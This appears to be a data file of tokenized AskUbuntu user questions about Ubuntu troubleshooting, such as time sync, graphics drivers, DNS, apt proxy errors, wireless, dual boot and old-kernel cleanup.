401553	error while attempting to synchronize system time	i recently noticed that the time on my system clock is off by several minutes . currently , my date and time settings say that the time is being set `` automatically from the internet '' . that does n't seem to be working , so i looked around for a way to sync the time on my system manually . after a bit of googling , i discovered the ntpdate command . unfortunately , this command seems to be erroring out : $ sudo ntpdate -d pool.ntp.org 7 jan 08:28:11 ntpdate [ 3489 ] : ntpdate 4.2.6p3 @ 1.2290-o tue jun 5 20:12:12 utc 2012 ( 1 ) looking for host pool.ntp.org and service ntp host found : ns20.alltraders.com transmit ( 173.230.149.23 ) transmit ( 149.20.68.17 ) transmit ( 209.118.204.201 ) transmit ( 64.251.10.152 ) transmit ( 173.230.149.23 ) transmit ( 149.20.68.17 ) transmit ( 209.118.204.201 ) transmit ( 64.251.10.152 ) transmit ( 173.230.149.23 ) transmit ( 149.20.68.17 ) transmit ( 209.118.204.201 ) transmit ( 64.251.10.152 ) transmit ( 173.230.149.23 ) transmit ( 149.20.68.17 ) transmit ( 209.118.204.201 ) transmit ( 64.251.10.152 ) transmit ( 173.230.149.23 ) transmit ( 149.20.68.17 ) transmit ( 209.118.204.201 ) transmit ( 64.251.10.152 ) 173.230.149.23 : server dropped : no data 149.20.68.17 : server dropped : no data 209.118.204.201 : server dropped : no data 64.251.10.152 : server dropped : no data server 173.230.149.23 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 173.230.149.23 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d6768d81.5b4dd22c tue , jan 7 2014 8:28:17.356 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 149.20.68.17 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 149.20.68.17 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d6768d81.8e81c0d2 tue , jan 7 2014 8:28:17.556 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 209.118.204.201 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 209.118.204.201 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d6768d81.c1b350c2 tue , jan 7 2014 8:28:17.756 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 64.251.10.152 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 64.251.10.152 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d6768d81.f4e76850 tue , jan 7 2014 8:28:17.956 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 7 jan 08:28:19 ntpdate [ 3489 ] : no server suitable for synchronization found i 'm confused . what 's wrong here ? it seems to me that it found plenty of servers , so why ca n't it sync with them ? i 'm behind a proxy , could that have something to do with it ?
401558	touchscreen stopped working	i have ubuntu 12.10 running with a touchscreen from iiyama ( prolite t1531sr ) which operates over a vga plug over an adapter into a hdmi port and a separate usb port to operate the touch screen . when i run lsusb i can still find the screen , however not with a xinput -- list command . does anyone have an idea ? edit : i figured it out . in /etc/modules.conf i had to add usbtouchscreen . hope this helps someone .
401563	dig and host queries not working on primary bind 12.04.3	i have followed the guide on this site to configure bind as a primary server , it was all going fine and i was ready to make it live , but am now getting these errors when testing against zones on the server . $ dig @ domain.com dig : could n't get address for 'domain.com ' failure $ host 10.10.10.31 host 31.10.10.10.in-addr.arpa not found : 2 ( servfail ) this happens to any ip or domain that i have configured on this server .
401564	how does fdupes determine which file to keep and which to delete from set of duplicate files scattered in storage disk ?	i just downloaded fdupes and was giving it a try . i am curious to know how the software goes about to determine which file it will put first when multiple files are found . i am running : distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise here is the command that i ran . fdupes -nrd /backup/local/fileserver_backup/home in that `` home '' directory there are two directories with identical content ( i used cp -r ./sam ./sam1 ) : sam/ ... sam1/ ... with the command above , i found that all the files were left in sam . but when i tried to run the same command with the following directory structure : sa/ ... sam/ ... i found that all the files were still left in sam , not sa as i expected . now my questions are : does fdupes always keep the oldest file ? how does it sort the files when finding the first and all subsequent duplicates ? is this os dependent ? is this something that the user can control ? i have some 300000 lines of duplicate files . being able to provide the software some guidance like , `` always keep files in this directory when given the choice , skip if not available '' or something like that would be great addition .
401566	some applications stopped showing in the launcher when open	some programs no longer show up on the launcher when they are opened . they also do n't show when i use alt + tab . it seemed to have happened after i installed skype but i 'm not sure if that 's relevant . i am using ubuntu 12.04 lts
401575	hotkeys not working on hp 255 g1	recently i lost hotkey funtionality on my hp 255 g1 which came with ubuntu preinstalled . i suspect that the last update did this . the keys that do not work are : screen togle ( should be turning off/on between main and secondary display ) and wi/fi key . can anyone help ? i tried to boot previous linux versions with no luck . ( as an option upon boot ) hp 's official forums do n't have any support for this and driverwise saying that linux is not supported and they send me here ... : -/
401576	clean ubuntu 13.10 64 bit install crashes on nvidia 8400m g 128 mb	after installing a clean ubuntu 13.10 64 bit on my asus f3sc it keeps crashing probably due to the graphics driver . after a few seconds/minutes the screen becomes dirty/garbled with some flashing here and there , and pretty soon the whole system just freezes . this happens using the default graphics driver but i also tried to install various other nvidia drivers such as the one from the x-swat ppa and older drivers too . i tried the nouveau driver too but it did n't work either . to make sure that my hardware works i installed windows xp and tested it for days using 2d/3d , and there were no problems . so what can i do now ?
401577	nvidia - no image	i have good image on xserver-xorg driver only if i put nouveau.modeset=0 . after i installed nvidia drivers i have no image and error `` low graphic mode '' . nvidia.modeset=0 does n't help . what i have to do ?
401578	stuck at login screen , help	i 've ubuntu 13.10 , when i write my password , ubuntu wait for 3-4 seconds and then show the login page again this error did n't happen after updates , i 'm still working to find many solutions but they were all not working that was one of them : press ctrl + alt + f1 login install gdm : sudo apt-get install gdm make gdm the default : sudo dpkg-reconfigure gdm reboot your machine please anyone can offer some help ? ?
401579	dual boot ubuntu 13.10 on ssd and widnows 7 on hdd	i am new to ubuntu and i do n't know how i can make dual boot . i have installed ubuntu on 16gb sdd and windows 7 on 1tb hdd . when i installed ubuntu it booted only windows 7 , i try boot repair and now it boots only ubuntu , please help thank you !
401581	bash one-liner to delete only old kernels	i 've seen lots of threads on how to free space on the /boot partition and that is my objective as well . however , i 'm only interested in deleting old kernels and not each one of them but the current one . i need the solution to be a one-liner since i 'll be running the script from puppet and i do n't want to have extra files lying around . so far i got the following : dpkg -l linux-* | awk '/^ii/ { print $ 2 } ' | egrep [ 0-9 ] | sort -t- -k3,4 -- version-sort -r | sed -e `` 1 , / $ ( uname -r | cut -f1,2 -d '' - '' ) /d '' | grep -v -e `uname -r | cut -f1,2 -d '' - '' ` | xargs sudo apt-get -y purge to be more precise , what it does at the moment is the following : list all the linux-* packages and print their names . only list the ones that have numbers and sort them , returning the reverse result . this way , older kernels are listed last . print only the results that go after the current kernel since there are some linux- { image , headers } results , make sure i wo n't purge anything related to my current kernel call apt to purge this works , but i 'm sure the solution can be more elegant and that it 's safe for a production environment , since at least 20 of our servers run ubuntu . thanks for your time , alejandro .
401584	there are alternative ways to unlock the screen other than writing the password ?	can i unlock the stand-by screen with a pattern or face recognition ?
401585	how to configuring which packages should be removed on ubuntu installation ?	on ubuntu installation not all packages on live session ( try ubuntu ) were installed on the ubuntu , some are removed . how i can configure which packages should be removed on an installation ? ( example : i want to keep gparted from live session and not removed on installation )
401588	add asymmetrical margin on lcd display ?	my old laptop display is starting to break , and i have many dead pixels and other physical issues on the left side of the screen only . of course i should get a new monitor ( or ideally a new laptop ) , but as a workaround i 'd like to configure the display to show a smaller screen size with a blank margin on the left where the broken area is . it should look approximately like this : + -- -+ -- -- -- -- -- -- -- -- -+ -- | b | | | l | remaining | 6 | a | screen | 0 | n | area | 0 | k | ( 904x600 ) | + -- -+ -- -- -- -- -- -- -- -- -+ -- |120| - 904 - | | - 1024 - | i 've managed to use cvt to generate a 904x600 modeline , and i can add that mode to the display using xrandr , but i can not for the life of me figure out how to position the smaller screen on the right side of my full display . it seems like the -- pos flag should work for this , but xrandr -- output lvds1 -- mode 904x600_60.00 -- pos 120x0 is n't working ( the screen shows up centered in the display , with equal margins on left and right ) . any tips on how to get this to work ? i 'm using ubuntu 13.10 , in case it makes a difference . thanks for any advice !
401591	is asus xonar u7 supported ?	i plan to buy asus xonar u7 usb sound card but do n't see drivers for linux in the asus site . i do n't see it in the alsa supported cards page either ( http : //www.alsa-project.org/main/index.php/matrix : vendor-asus ) . does anyone know whether its supported in linux ?
401592	wireless driver not working on a hp pavilion 17-e049wm laptop pc	when i installed ubuntu 12.04 on my hp pavilion 17-e049wm laptop pc everything works fine but the wireless card in it , i ca n't fine the drivers under addition diver and when i use windows wireless drivers i keep getting errors . is there any good pnp usb wireless adapter i could use with ubuntu 12.04 or should i wait until ubuntu 14.04 to come out ?
401594	alsa equalizer gives me an error after installation	so i gave up with pulseaudio for some reasons and decided to install fresh alsa . afterwards i downloaded alsa equalizer and installed it what looked a bit weird karol @ karol-h61m-ds2 : ~/pulpit/alsaequal $ sudo make install installing ... karol @ karol-h61m-ds2 : ~/pulpit/alsaequal $ and this is how the installation ended . after the 'installation ' i got this error : karol @ karol-h61m-ds2 : ~ $ alsamixer -d equal alsa lib dlmisc.c:252 : ( snd1_dlobj_cache_get ) can not open shared library /usr/lib/x86_64-linux-gnu/alsa-lib/libasound_module_ctl_equal.so i will be so gratefull if you will tell me what 's going on . thank you !
401595	autocomplete at desktop level	i often type the same words in several applications : editor ( emacs , vi ) webbrowser shells it would be great to have an autocomplete of the words i typed during the last week available in all the above applications . each of them has a way to improve the typing speed . but something at desktop level would be the best . example : `` continuous integration '' . i want a fast way to type this word without changing the program which receives the input . do you understand what i mean ? is there already something like this ?
401597	sound not working after upgrades in ubuntu 12.04 lts but wine sound works	i have installed ubuntu 12.04 lts on a hp compaq 6000 pro running intel core 2 duo with onboard sound using realtek alc261 . system sound worked fine until the last update on jan 4 . now it produces the ubuntu greeting sound , but when i login the system sound does not work . oddly enough the sounds in my quicken running in crossover ( wine ) are working fine . when i open the sound settings the only device showing is the digital audio output . no analog available . i have reinstalled pulseaudio , alsamixer and gnome alsa controller . have verified nothing muted . can any one offer a solution to this dilemma ? obviously something was changed at the last update but not sure what happened and how to reverse it .
401599	error on `` make get-monolite-latest '' for mono3	i 'm new to ubuntu and tying to install latest mono on ubuntu . when i issued the command make get-monolite-latest but i got this error message rm -fr /home/avalon/monobuild/mono/mcs/class/lib/monolite-* mkdir -p /home/avalon/monobuild/mono/mcs/class/lib test ! -d /home/avalon/monobuild/mono/mcs/class/lib/monolite || test ! -d /home/avalon/monobuild/mono/mcs/class/lib/monolite.old || rm -fr /home/avalon/monobuild/mono/mcs/class/lib/monolite.old test ! -d /home/avalon/monobuild/mono/mcs/class/lib/monolite || mv -f /home/avalon/monobuild/mono/mcs/class/lib/monolite /home/avalon/monobuild/mono/mcs/class/lib/monolite.old cd /home/avalon/monobuild/mono/mcs/class/lib & & { ( wget -o- http : //storage.bos.xamarin.com/mono-dist-master/latest/monolite-110-latest.tar.gz || curl http : //storage.bos.xamarin.com/mono-dist-master/latest/monolite-110-latest.tar.gz ) | gzip -d | tar xf - ; } -- 2014-01-07 07:51:57 -- http : //storage.bos.xamarin.com/mono-dist-master/latest/monolite-110-latest.tar.gz resolving storage.bos.xamarin.com ( storage.bos.xamarin.com ) ... 198.0.162.157 connecting to storage.bos.xamarin.com ( storage.bos.xamarin.com ) |198.0.162.157|:80 ... connected . http request sent , awaiting response ... 404 not found 2014-01-07 07:51:59 error 404 : not found . /bin/bash : curl : command not found gzip : stdin : unexpected end of file tar : this does not look like a tar archive tar : exiting with failure status due to previous errors make : *** [ get-monolite-latest ] error 2 someone said the latest version of monolite is now 111 not 110 anymore but i do n't know how to apply the link changes to `` make get-monolite-latest '' command to install monolite compiler
401601	ubuntu 12.04lts ( kernel 3.8.0-35 ) does n't shutdown	broadcast message from root @ user-desktop ( unknown ) at 15:32 ) the system is going down for halt now ! acpid : exiting checking for running unattended-upgrades : speech-dispatcher disabled ; edit etc/default/speech-dispatcher [ ok ] * asking all remaining system to terminate ... [ fail ] * killing all remaining processes ... nm-dispatcher.action [ 911 ] : < info > caught signal 15 , shutting down ... * deconfiguring network interfaces ... [ ok ] * deactivating swap ... [ ok ] umount : /run/lock : not mounted umount /run/shm : not mounted mount / is busy * will now halt note : also did n't work with the following commands : sudo shutdown -h now sudo poweroff
401602	is my ram usage natural ? ( clean ubuntu install by vps provider )	i 'm still a linux beginner , but for my university project i had to rent a vps . when i got my vps , free -m shows me that it is already using 175 mb of 2gb . i wanted to ask that is this normal ? googling shows me that a clean install of ubuntu ( server ) , takes up only 40-50 megs of the ram , but my system is using 175 mb already , and i still have n't done anything on it . ( when i did apt-get update and apt-get upgrade , my usage went up to 230mb , but i think that 's normal for the package manager ) i 'm running ubuntu 12.0.4 , and here 's my free -m : total used free shared buffers cached mem : 2016 203 1813 0 12 155 -/+ buffers/cache : 34 1981 swap : 509 0 509 and here is my top : http : //pastie.org/8610355 and here is lsmod : module size used by psmouse 82769 0 serio_raw 13031 0 coretemp 13324 0 ppdev 12849 0 vmw_balloon 12700 0 microcode 18433 0 i2c_piix4 13227 0 vmwgfx 115982 0 ttm 76149 1 vmwgfx drm 233935 2 vmwgfx , ttm parport_pc 27612 1 shpchp 32265 0 mac_hid 13077 0 lp 17455 0 parport 40930 3 ppdev , parport_pc , lp floppy 60183 0 e1000 106020 0 mptspi 22474 2 mptscsih 39532 1 mptspi mptbase 96852 2 mptspi , mptscsih thanks for any help , and clearing some confusions .
401603	`` pxe-e61 : media test failure '' installation boot problem with ubuntu	for the first time in my life i am installing an os . i installed it properly using a usb . after the installation , it asked to restart . on restarting , two things are happening : i restart with the pendrive it is asking me to select one of the four options- try ubuntu without installation install ubuntu oem install ( for manufacturers ) check disk for defects i restart without the pendrive it says- pxe-e61 : media test failure , check cable pxe-m0f : reboot and select proper boot device . please help ! !
401608	how to print from a 32-bit 12.04 ubuntu laptop to a printer on a 64-bit windows 7 pro computer	the answer to this question is that you have to go into the printer preferences of the printer connected to the windows 7 pro computer and click on the ports tab . then find where it says bi-directional printing and un-check it and save . then you will be able to print from your ubuntu computer to the printer on the windows7 pro computer . i have a hp desk-jet f380 all-in-one printer connected to my windows 7 pro 64-bit computer at home . i am trying to print to that printer from my 32-bit 12.04 ubuntu laptop.the printer is shared by my windows computer and i installed it on my 12.04 ubuntu laptop and says it is accessible per the instructions from ubuntu . i try to send a test print page to the printer and it gets sent ok and the printer starts as though it is going to print the test page but then it stops and the light on the printer stays blinking as though it is going to print . i have read many posts on this but have yet to find anything that works . most say that i have to install the 32-bit drivers on my 64-bit systems and i try to do this following the the instructions from this web site http : //www.labnol.org/software/share-printer-between-different-windows-computers/9530/ . every time i do this i get a pop up that says the drivers for thing device are not in the folder . i down loaded the 32-bit driver from the hp website . what doi need to do . any help would be greatly appreciated . this is on a home network with 3 windows 7 computers ( 2 laptops with home edition ( 64-bit ) and 1 desktop with pro ( 64-bit ) ) and of course the 12.04 32-bit ubuntu laptop . could it be a ram issue in the laptop as not enough in it . i have 1.2gigs in it right now of pc-2700 curt
401612	how to install ubuntu touch on a tablet ?	i have a galaxy tab 3 7.0 and i want to install ubuntu touch on it , someone can help me ? i looked at the specs of galaxy tab 2 7.0 and they have the same specs , even the resolution ( 600x1024 ) , can i install ubuntu for gt2 7.0 on my gt3 7.0 ?
401616	what is `` clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) ''	i installed a fresh ubuntu 13.10 , the first thing i want to do is to update system but i got this error : e : gpg error : http : //extras.ubuntu.com saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) after executing : sudo apt-get update what should i do ? notes : i am connected to internet using usb 3g modem . iam not using proxy . i got this erorr in all ubuntu distro ! ! ! ( i tested linux mint 16 cinnamon & kde + zorin 8 rc ) . i now it is not the place to discuss ubuntu disto but i think the problem in the ubuntu itself . and i also reinstall both ubuntu x32 and ubuntu x64 but with no hope : ( output of : sudo apt-get update -o debug : :acquire : :http=true 79 % [ connecting to archive.ubuntu.com ( 91.189.92.200 ) ] [ connecting to security.ubuntu.com ( 91.189.91.13 ) ] get /ubuntu/dists/saucy/inrelease http/1.1 host : archive.ubuntu.com connection : keep-alive cache-control : max-age=0 accept : text/* range : bytes=212- if-range : sun , 12 jan 2014 07:45:46 gmt user-agent : debian apt-http/1.3 ( 0.9.9.1~ubuntu1 ) get /ubuntu/dists/saucy-security/inrelease http/1.1 host : security.ubuntu.com connection : keep-alive cache-control : max-age=0 accept : text/* range : bytes=212- if-range : sun , 12 jan 2014 07:52:13 gmt user-agent : debian apt-http/1.3 ( 0.9.9.1~ubuntu1 ) http/1.1 200 ok content-type : text/html ; charset=utf-8 content-length : 213 date : sun , 12 jan 2014 07:52:45 gmt server : apache/2.2.22 ( ubuntu ) connection : keep-alive vary : accept-encoding get:1 http : //archive.ubuntu.com saucy inrelease [ 213 b ] 99 % [ 1 inrelease gpgv 213 b ] [ connecting to archive.ubuntu.com ( 91.189.92.200 ) ] [ waiting for headers ] splitting up /var/lib/apign http : //archive.ubuntu.com saucy inrelease e : gpg error : http : //archive.ubuntu.com saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) i installed new ubuntu 14.04 on a virtual machine and i got the same error
401617	how do i solve laptop overheating and battery draining really fast ?	the question is : how do i stop making my computer burn with ubuntu 's broken packages and how can i make my laptop 's battery last a lot longer ?
401619	i have a 24 gig ram pc with intel xeon and still get 3 fps on minecraft	i tried allocating 20 gigs to minecraft but it only uses about 1 .
401622	unable to update from 13.04 to 13.10	when i try to update i get the following errors and the update stops . w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/saucy/release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -11 - system error ) , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/saucy/release.gpg something wicked happened resolving 'archive.canonical.com : http ' ( -11 - system error ) , e : some index files failed to download . they have been ignored , or old ones used instead . any suggestions on how i can proceed from this ?
401627	gnome shell - disabling live window thumbnails in activities	i have noticed it slows down the system when a browser game or real game is open because it renders them all in the activities menu . is there a way to make them static ?
401629	windows has gone missing from the grub menu	i 've tried re installing ubuntu 13.10 on my pc by formating it 's partition with gparted . unfortunately , the windows 7 option has gone missing from the grub menu . i tried boot-repair and here is the results- http : //paste.ubuntu.com/6708553/ in addintion , sudo update-grub does n't help nor it prints a line with `` window 7 '' . thank you
401632	new user tips , tricks , and hacks	i am a new user to ubuntu , i have been working with windows since 3.1 and just got into playing with mac last year ( spring 2013 ) but now want to expand my knowledge base to linux , i am installing ubuntu 12.04.3 on an old netbook that i have been using win7 on for work , i am not familiar with how to place apps on desktop or even find new apps ... can anyone provide some super basic starter knowledge ? thanks !
401633	simple gui to display static text informations	i would like to know if there is a way to write or modify a simple program ( i do n't really care what language it 'll use ) that can be launched in gui mode and will display formated text and url that will open in a web-browser by a simple clic . a good example of the program i would like to run is the `` about - information '' window that can be found on most programs , example : it has everything i look for : simple windows using same theme as the de no menu possibility of displaying images formated text ( bold , italic , font-size ) url links with custom clickable name buttons ( that one is not really important , it could be usefull but i 'm afraid it 's too hard to configure `` actions '' for my level in development ) my idea would be going for something like that ( where orange is a url link ) : note : i just drew that , it is n't an existing program . i unfortunately do n't have time to learn a developer language like c++ , python , qt , but i can examine a file with gedit ( or alike ) and adapt the content , that should n't be really difficult as i have experience on looking at configuration files and modifying them , you know , to see what would happen if i change this or that . are there any prebuilt code i could use and/or modify ? thanks ps : html would have been great but apparently there 's no easy way to achieve this , nor prebuilt `` html interpretator non web-browser '' i could use .
401636	corrupted graphics in icons , info boxes and bash in ubuntu 12.04	i 've recently installed ubuntu 12.04 lts 64-bit , as you can see in the screen shot , some icons are pixelated , as well as the bash and the infoboxes that appear when you hover over an icon . my graphics card is [ amd/ati ] rv730/m96 [ mobility radeon hd 4650/5165 ]
401643	switch from ubuntu to windows 7	i want to switch from ubuntu to windows 7 using usb because i do n't have a dvd/cd drive pls help
401647	realtek 8723ae driver works badly	\o so my wireless card works . at home , it would work nicely on both windows 8 and ubuntu , with a very steady , sustained connection . however , now that university started , i 'm in a hub with much more traffic , and the connection is exceedingly choppy . my old laptop had no issues in that hum ( i sit litterally at the same desk ) . so here are a few things : morphheus @ nyx : ~ $ cat /etc/*-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.3 lts '' morphheus @ nyx : ~ $ lspci | grep network 05:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter morphheus @ nyx : ~ $ iwconfig wlan0 wlan0 ieee 802.11bgn essid : '' wpa.mcgill.ca '' mode : managed frequency:2.437 ghz access point : 00:1a:1e : de:3e:43 bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:329 missed beacon:0 morphheus @ nyx : ~ $ modprobe -l | grep rtl -i kernel/drivers/tty/serial/uartlite.ko kernel/drivers/net/wireless/rtl818x/rtl8180/rtl8180.ko kernel/drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko kernel/drivers/net/wireless/rtlwifi/rtl_usb.ko kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko kernel/drivers/net/wireless/rtlwifi/rtl8192cu/rtl8192cu.ko kernel/drivers/net/wireless/rtlwifi/rtl8192se/rtl8192se.ko kernel/drivers/net/wireless/rtlwifi/rtl8192de/rtl8192de.ko kernel/drivers/net/wireless/rtlwifi/rtl8723ae/rtl8723ae.ko kernel/drivers/net/wireless/rtlwifi/rtl8188ee/rtl8188ee.ko kernel/drivers/net/usb/rtl8150.ko kernel/drivers/media/usb/dvb-usb-v2/dvb-usb-rtl28xxu.ko kernel/drivers/media/dvb-frontends/rtl2830.ko kernel/drivers/media/dvb-frontends/rtl2832.ko kernel/drivers/staging/rtl8187se/r8187se.ko kernel/drivers/staging/rtl8192u/r8192u_usb.ko kernel/drivers/staging/rtl8192e/rtllib.ko kernel/drivers/staging/rtl8192e/rtllib_crypt_ccmp.ko kernel/drivers/staging/rtl8192e/rtllib_crypt_tkip.ko kernel/drivers/staging/rtl8192e/rtllib_crypt_wep.ko kernel/drivers/staging/rtl8192e/rtl8192e/r8192e_pci.ko kernel/drivers/staging/rtl8712/r8712u.ko kernel/drivers/staging/rtl8188eu/r8188eu.ko kernel/drivers/platform/x86/ibm_rtl.ko morphheus @ nyx : ~ $ lspci -v 05:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter subsystem : azurewave device 2114 flags : bus master , fast devsel , latency 0 , irq 17 i/o ports at c000 [ size=256 ] memory at f7800000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : rtl8723ae kernel modules : rtl8723ae the signal strength is very similar to what i had on my old laptop , but it fluctuates a damn lot . one thing i realize is that while the wireless rtl8723ae driver is loaded , i do n't see any 8723 driver loaded for the pci card . again , the connection works in a quiet area , but is horrible in a busy area . reports on internet is that the card itself is just bad design , and i should get a new one . before i go and change my wireless card with my old laptop 's ( or a new one if it 's incompatible ) , does anyone have an idea on how i could stabilize my wireless connection ? many thanks
401648	guest session - data lost	i installed ubuntu 12.04lt sometime ago in my pc . i also enabled guest session option . my sister was using the libre office writer in the guest session , wrote a document and saved it . after restarting the laptop , she found that the document was not there . even the history of firefox was cleared . everything works fine with administrator account . is it so that nothing is saved in guest session ? if yes , how can i recover the files ? its pretty important !
401649	how do i get adobe photoshop cs5 toork with ubuntu ? and how is the wacom tablet support ?	i 'm new to linux and have a few questions about what i can and ca n't do with it .
401652	ca n't connect to apt-get behind proxy	my coworker and i have struggled with this for a while through several reinstalls and here 's where we are now . we put in our proxy info in the ubuntu server setup : http : //user : pass @ 1.2.3.4:5678/ when we try to sudo apt-get update , we are told : e : gpg error : http : //security.ubuntu.com precise-security release : the following signatures were invalid : nodata 1 nodata 2 we have attempted to set proxy settings in /etc/apt/apt.conf as well as in /etc/environment with no luck . i know there are a lot of forum responses here and elsewhere on the web answering this question , but none of those seem to be fixing it for us . any ideas are deeply appreciated . thanks !
401655	like pluma or gedit with spell-check	i am a lousy speller . i like using pluma , and gedit because they open fast , and do just about everything i need . but automatic spell-check would be very nice . i can copy paste into online spell-checkers , but this is an extra step . i do n't want to have to tell it to check spelling . i want to know what i am am spelling wrong , as i type . the html web element `` textarea '' would be perfect , if it let me save , and warned me if i were about to close a not saved document . can gedit or pluma offer this ?
401657	is there a reason that i am getting the error message `` could n't mount file '' when i first attempt to run the 12.04.3 version ?	i am running a version of windows 8 and have downloaded the 12.04.3 version of ubuntu . when i try to run the file for the first time i am met with the error message `` could n't mount file . ''
401659	no motd on first login after upgrade to 13.10	one of my favorite things when i installed ubuntu server 10.04lts was the motd with the landscape-common data . after updating to 13.10 and having some trouble at first with motd not working at all , it finally does work , but not during the first login . once i exit and log back in , then the motd does show .
401660	install 12.04 lts results in reboot , windows works	i 'm trying to install ubuntu lts 12.04 on an older dell desktop ( p4 1gb ram ) for a friend to use to browse the web and use email and whatnot . xp works on that machine . i have a bootable 12.04 usb and a dvd . both devices will pick up and get to the boot screen . if i select `` try ubuntu '' or `` install ubuntu '' it goes to a black terminal screen with the underscore which flashes for about 30 seconds and then restarts the machine through bios . it 'll repeat this all day . i 've tried battery removal from the mobo for cmos flash , turned off quickboot , with no change . there is no os currently on the machine , i 've used a windows cd to try to delete all partitions and build a new unformatted partition and still nothing . it appears that it 's not even trying to start the install . i 've tried quite a few combinations of f6 options to no avail as well . also , the windows md5 checksum program shows c4f4c7a0d03945b78e23d3aa4ce127dc and that matches the checksum for 12.04lts in the howto which rules out download corruption .
401661	'locate ' command in terminal . why is it so fast ?	searching a keyword in linux terminal using the locate command gives answer in a short time . what is the search algorithm used ?
401669	contents of a drive are not visible	my contents of a drive are not visible in ubuntu , but they are visible in windows . this drive does not contain either os . i can see its contents in the terminal however . using nautilus browser i can see the icon of my drive but when i click on it it 's contents are not visible . output of sudo blkid : /dev/sda1 : label= '' winre_drv '' uuid= '' 3a1cf4b01cf46871 '' type= '' ntfs '' /dev/sda2 : label= '' system_drv '' uuid= '' ccf6-b54f '' type= '' vfat '' /dev/sda3 : label= '' lrs_esp '' uuid= '' 6ef6-f5d2 '' type= '' vfat '' /dev/sda5 : label= '' windows8_os '' uuid= '' 2488fa3188fa015a '' type= '' ntfs '' /dev/sda6 : label= '' gallery '' uuid= '' 72c26897c2686179 '' type= '' ntfs '' /dev/sda7 : label= '' lenovo '' uuid= '' 3cf6fc59f6fc153c '' type= '' ntfs '' /dev/sda8 : label= '' pbr_drv '' uuid= '' ce30fd9930fd892b '' type= '' ntfs '' /dev/sda9 : uuid= '' b3192bfd-1763-4bfe-a0d9-fbda5bb213de '' type= '' ext4 '' output of mount : /dev/sda9 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /sys/firmware/efi/efivars type efivarfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda2 on /boot/efi type vfat ( rw ) gvfs-fuse-daemon on /home/mayank/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=mayank ) /dev/sda6 on /media/gallery type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda7 on /media/lenovo type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda1 on /media/winre_drv type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 )
